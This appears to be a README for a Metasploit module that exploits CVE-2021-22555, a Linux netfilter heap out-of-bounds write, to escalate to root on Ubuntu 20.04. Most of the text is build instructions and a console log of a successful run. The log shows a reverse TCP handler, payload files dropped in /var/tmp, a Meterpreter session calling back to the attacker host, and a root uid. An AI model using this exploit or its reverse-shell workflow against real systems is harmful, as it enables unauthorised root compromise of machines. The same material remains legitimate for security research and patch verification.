1.5 KiB
1.5 KiB
Netfilter_xtables_Heap_OOB_Write_Privilege_Escalation_CVE-2021-22555
LPE exploit for CVE-2021-22555. Tested on Ubuntu 20.04 kernel 5.8.0-48-generic. The vulnerability was discovered by Andy Nguyen @theflow0.
Author: Szymon Janusz
For educational/research purposes only. Use at your own risk.
Usage:
The exploit binary must be built on a Linux environment as it relies on Linux header files.
To build:
make ubuntu
To run:
msf6 exploit(linux/local/netfilter_xtables_heap_oob_write_priv_esc) > run
[*] Started reverse TCP handler on 192.168.1.145:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Target is running kernel release 5.8.0-48-generic.
[*] Dropping pre-compiled binaries to system...
[*] Writing '/var/tmp/flTJOaqhI' (734660 bytes) ...
[*] Uploading payload...
[*] Writing '/var/tmp/ckaFBkiL' (250 bytes) ...
[*] Running payload on remote system...
[*] Sending stage (3012548 bytes) to 192.168.1.67
[+] Deleted /var/tmp/flTJOaqhI
[+] Deleted /var/tmp/ckaFBkiL
[*] Meterpreter session 2 opened (192.168.1.145:4444 -> 192.168.1.67:43322) at 2021-09-28 14:20:41 +0100
[*] Payload executed!
meterpreter > getuid
Server username: root @ ubuntu-virtual-machine (uid=0, gid=0, euid=0, egid=0)
Checkout the writeup CVE-2021-22555: Turning \x00\x00 into 10000$.